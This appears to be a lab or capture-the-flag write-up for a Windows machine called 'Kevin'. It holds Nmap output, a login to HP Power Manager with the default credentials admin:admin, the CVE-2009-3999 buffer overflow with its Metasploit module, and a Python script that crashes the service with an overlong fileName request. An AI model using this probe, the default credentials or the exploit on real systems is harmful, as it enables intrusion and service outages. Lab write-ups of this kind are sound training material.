# Kevin

## Nmap

```
sudo nmap 192.168.214.45 -p- -sS -sV

PORT      STATE SERVICE            VERSION
80/tcp    open  http               GoAhead WebServer
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ssl/ms-wbt-server?
3573/tcp  open  tag-ups-1?
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49155/tcp open  msrpc              Microsoft Windows RPC
49158/tcp open  msrpc              Microsoft Windows RPC
49160/tcp open  msrpc              Microsoft Windows RPC
Service Info: Host: KEVIN; OS: Windows; CPE: cpe:/o:microsoft:windows
```

The default page on port 80, <http://192.168.214.45/index.asp>, takes us to a login screen for HP Power Manager. A quick Google search shows the default credentials are `admin:admin`.

![](/files/-MWoH21ypS5GpMIdK2d4)

After logging in, the Help tab reveals the version information.

![](/files/-MWoHB3X-qM6Ga_snmTj)

`Searchsploit` shows that this version of HP Power Manager is vulnerable to a remote buffer overflow, **CVE-2009-3999**.

**Description:**

Stack-based buffer overflow in goform/formExportDataLogs in HP Power Manager before 4.2.10 allows remote attackers to execute arbitrary code via a long `fileName` parameter.

![](/files/-MWoI2SiSqnVizXw1YyH)

{% embed url="<https://www.exploit-db.com/exploits/18015>" %}

The Metasploit module `exploit/windows/http/hp_power_manager_filename` was used to exploit it.
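Before firing the module, two checks are worth doing by hand: confirm the version read off the Help tab is actually below the fixed release (4.2.10), and look at what the vulnerable handler receives so the length of `fileName` is an explicit, controllable number rather than something buried in the module. The script below is an added example written for this writeup; it is not the Metasploit module and not from the original page. It assumes the handler takes a form-encoded POST whose trigger parameter is named `fileName` as in the CVE text, and it sends no offsets, return address or payload, only a length probe; the version strings used in the comments are constructed.

```python
"""Pre-exploitation checks for CVE-2009-3999 (HP Power Manager fileName overflow).

Added example for this writeup, not the page's own tooling and not the
Metasploit module. Assumptions not taken from the page: the vulnerable
handler accepts a form-encoded POST, and the trigger parameter is `fileName`
(the name given in the CVE text). No other form fields are assumed.
"""
import re
import socket
from urllib.parse import urlencode

FIXED_VERSION = (4, 2, 10)  # first fixed release per CVE-2009-3999
VULN_PATH = "/goform/formExportDataLogs"  # handler named in CVE-2009-3999


def parse_version(text):
    """Return the first dotted version in a Help-tab string as an int tuple.

    Returns None when no version is present.
    """
    m = re.search(r"\b(\d+(?:\.\d+)+)\b", text)
    if not m:
        return None
    return tuple(int(p) for p in m.group(1).split("."))


def is_affected(version_text):
    """True when the version is strictly below 4.2.10.

    Tuples compare element-wise, so (4, 2, 9) < (4, 2, 10) even though the
    strings "4.2.9" and "4.2.10" sort the other way lexically.
    """
    v = parse_version(version_text)
    if v is None:
        raise ValueError("no version found in %r" % version_text)
    v = v + (0,) * (len(FIXED_VERSION) - len(v))  # "4.2" compares as 4.2.0
    return v < FIXED_VERSION


def build_probe(host, length, filler="A"):
    """Build the raw HTTP request for the vulnerable handler.

    `length` copies of `filler` are sent in fileName. This is a length probe
    only: no offsets, return address or shellcode are included (assumed
    request shape, see module docstring).
    """
    body = urlencode({"fileName": filler * length}).encode()
    headers = (
        "POST %s HTTP/1.1\r\n"
        "Host: %s\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        "Content-Length: %d\r\n"
        "Connection: close\r\n\r\n"
    ) % (VULN_PATH, host, len(body))
    return headers.encode() + body


def send_probe(host, port, length, timeout=5):
    """Send the probe and return whatever the server answers.

    An empty answer (or a dropped connection) after a long fileName, when a
    short one gets a normal reply, is the usual sign the worker crashed.
    """
    req = build_probe(host, length)
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(req)
        try:
            return s.recv(4096)
        except socket.timeout:
            return b""


if __name__ == "__main__":
    import sys
    # Usage: python probe.py <host> [port] [fileName length]
    host = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 80
    length = int(sys.argv[3]) if len(sys.argv) > 3 else 2000
    print("response bytes:", len(send_probe(host, port, length)))
```

Run the probe twice, once with a short `fileName` and once with a long one; only the second should fail to get a response. Do this against the lab box only, since a successful probe crashes the service and any session the module later needs.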

![](/files/-MWoIcTMlARYOJO9K4tU)

